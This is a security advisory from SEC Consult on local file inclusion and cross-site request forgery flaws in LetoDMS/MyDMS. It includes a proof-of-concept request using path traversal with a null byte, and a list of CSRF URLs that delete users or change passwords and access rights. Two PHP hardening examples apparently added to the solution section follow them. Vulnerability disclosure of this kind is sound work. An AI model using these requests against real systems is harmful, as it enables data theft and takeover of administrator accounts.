LetoDMS (MyDMS) Local file inclusion/execution and multiple CSRF

2010.05.26
Risk: Medium
Local: No
Remote: Yes

SEC Consult Security Advisory < 20100115-0 >
========================================================================
title: Local file inclusion/execution and multiple
Cross-Site-Request-Forgery vulnerabilities in LetoDMS (formerly MyDMS)
products: LetoDMS (formerly MyDMS)
vulnerable version: LetoDMS (formerly MyDMS) <= 1.7.2
fixed version: n.a.
impact: critical
homepage: http://sourceforge.net/projects/mydms/
found: 2009-10-09
by: D. Fabian / SEC Consult / www.sec-consult.com
L. Weichselbaum / SEC Consult / www.sec-consult.com
========================================================================

Vendor description:
-------------------
MyDMS is an open-source, web-based document management system (DMS) written in PHP with a database backend. Originally coded by Markus Westphal, MyDMS provides document meta-data, version control, security and easy access to your documents.

source: http://sourceforge.net/projects/mydms/

Vulnerability overview/description:
-----------------------------------
The lang-parameter of /mydms/op/op.Login.php is vulnerable to file inclusion. Through this vulnerability it is possible to read sensitive data of the web server and to execute malicious PHP-code.

Furthermore there exist multiple Cross-Site-Request-Forgery vulnerabilities which can be used to force a user/admin to execute unwanted actions. Some of these actions are:

* Create new user with admin-privileges
* Change user credentials
* Delete a user/folder/document
* Change owner of a document
* Change access to a document
* Add keywords
* Add notifications
* Move folders

Proof of concept:
-----------------

File inclusion/execution
========================
If the guest-account is activated or you have a user to log in, it is possible to include or execute files. The lang-parameter can be modified in a malicious way. To terminate the predefined file-ending a null-byte has to be appended after the file to be included. The following GET-request can be used to e.g. receive the content of the boot.ini-file on a server running Windows as operating system. This vulnerability can also be used to execute malicious PHP-code (e.g. PHP-code that has been written into log-files).

PoC request
GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../boot.ini%00&sesstheme= HTTP/1.1
[...]

Cross-Site-Request-Forgery (CSRF)
=================================
The following requests can be used for CSRF-attacks:

- (only POST) /mydms/op/op.EditUserData.php?pwd=0wned&pwdconf=0wned&fullname=Administrator&email=address (at) server (dot) com&comment=&userfile=
- /mydms/op/op.UsrMgr.php?userid=3&action=removeuser
- /mydms/out/out.RemoveVersion.php?documentid=1&version=1
- /mydms/op/op.RemoveFolder.php?folderid=2
- /mydms/op/op.DefaultKeywords.php?action=addcategory&name=test
- /mydms/op/op.GroupMgr.php?action=addgroup&name=test&comment=
- /mydms/op/op.FolderAccess.php?action=setowner&folderid=1&ownerid=3
- /mydms/op/op.FolderAccess.php?folderid=1&action=setdefault&mode=4
- /mydms/op/op.FolderAccess.php?folderid=1&action=addaccess&userid=3&groupid=-1&mode=4
- /mydms/op/op.FolderNotify.php?folderid=1&action=addnotify&userid=3&groupid=-1
- /mydms/op/op.MoveFolder.php?folderid=4&targetid=1

It is assumed that there is more functionality vulnerable to CSRF-attacks.

Vulnerable versions:
--------------------
MyDMS * <= 1.7.2

Vendor contact timeline:
------------------------
2009-10-29: Contacting developers on SourceForge.Net and on trilexnet.com by contact-form and the dev-forum.
2009-12-11: No response from developers so far.
2009-12-11: New attempt to contact developers.
2010-01-15: No response from developers.
2010-01-15: Release of the advisory.

Solution:
---------
n.a.
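As an added illustration (not LetoDMS/MyDMS code), the include pattern the lang-parameter description implies, next to a whitelist-based replacement that a maintainer could apply in the absence of a vendor fix; the languages/<code>/lang.inc layout, the function names and the English default are assumptions.

```php
<?php
// Added example, not LetoDMS/MyDMS code. The unsafe shape is assumed from the
// advisory: the request's "lang" value is concatenated into an include path
// that ends in a fixed file name, which "../" plus a %00 byte defeats.
declare(strict_types=1);

// Assumed layout: languages/<code>/lang.inc
const LANG_DIR = __DIR__ . '/languages';

// Unsafe pattern: traversal and the null byte reach include() unchecked.
function load_language_unsafe(string $lang): void
{
    include LANG_DIR . '/' . $lang . '/lang.inc';
}

// Hardened: the path is built only from a value that appears verbatim in
// the whitelist of shipped language codes. An exact match is required, so
// "../../../../boot.ini\0" and "English/../x" both fall back to the default.
function resolve_language(string $requested, array $available, string $default = 'English'): string
{
    if (preg_match('/^[A-Za-z]{2,32}$/', $requested) === 1
        && in_array($requested, $available, true)) {
        return $requested;
    }
    return $default;
}

// Whitelist derived from the directories actually present, never from input.
function available_languages(): array
{
    $entries = scandir(LANG_DIR) ?: [];
    return array_values(array_filter($entries, static function (string $e): bool {
        return $e !== '.' && $e !== '..' && is_dir(LANG_DIR . '/' . $e);
    }));
}

function load_language(string $requested): void
{
    $lang = resolve_language($requested, available_languages());
    include LANG_DIR . '/' . $lang . '/lang.inc';
}

// Constructed check with a fixed whitelist: the PoC value is rejected.
$shipped = ['English', 'German', 'French'];
assert(resolve_language("../../../../boot.ini\0", $shipped) === 'English');
assert(resolve_language('German', $shipped) === 'German');
```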
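An added example (not LetoDMS/MyDMS code) of the server-side controls that close the CSRF list above: state-changing op.*.php handlers accept only POST requests that carry a per-session token, so a plain link such as the removeuser URL is refused; function and field names are assumptions, and session_start() is assumed to have run before require_csrf() is called.

```php
<?php
// Added example, not LetoDMS/MyDMS code. Two controls: reject GET for
// state-changing actions, and require a per-session token on POST.
declare(strict_types=1);

const CSRF_FIELD = 'csrf_token';

// Issue (or reuse) the session token; called when rendering a form.
function csrf_token(): string
{
    if (empty($_SESSION[CSRF_FIELD])) {
        $_SESSION[CSRF_FIELD] = bin2hex(random_bytes(32));
    }
    return $_SESSION[CSRF_FIELD];
}

// Hidden input to embed in every form that posts to an op.*.php script.
function csrf_field(): string
{
    return '<input type="hidden" name="' . CSRF_FIELD . '" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Gate for state-changing handlers: true only for a POST whose token
// matches the session token (constant-time comparison).
function csrf_request_allowed(string $method, array $post, ?string $sessionToken): bool
{
    if ($method !== 'POST' || $sessionToken === null || $sessionToken === '') {
        return false;
    }
    $submitted = $post[CSRF_FIELD] ?? '';
    return is_string($submitted) && hash_equals($sessionToken, $submitted);
}

// Call at the top of e.g. op.UsrMgr.php before action=removeuser is handled.
function require_csrf(): void
{
    $ok = csrf_request_allowed($_SERVER['REQUEST_METHOD'] ?? 'GET', $_POST,
                               $_SESSION[CSRF_FIELD] ?? null);
    if (!$ok) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
}

// Constructed check: the advisory's GET link shape is refused; a POST
// carrying the session token is accepted; a wrong token is refused.
$token = bin2hex(random_bytes(32));
assert(csrf_request_allowed('GET', [], $token) === false);
assert(csrf_request_allowed('POST', [CSRF_FIELD => $token], $token) === true);
assert(csrf_request_allowed('POST', [CSRF_FIELD => 'x'], $token) === false);
```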
Advisory URL:
-------------
https://www.sec-consult.com/advisories.html#a64

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

SEC Consult conducts periodical information security workshops on ISO 27001/BS 7799 in cooperation with BSI Management Systems. For more information, please refer to https://www.sec-consult.com/academy_e.html

EOF L. Weichselbaum / @2010

References:

https://www.sec-consult.com/files/20100115-0_mydms_file_inclusion.txt
http://xforce.iss.net/xforce/xfdb/55710
http://www.securityfocus.com/archive/1/archive/1/508947/100/0/threaded
http://secunia.com/advisories/38237
http://osvdb.org/61835

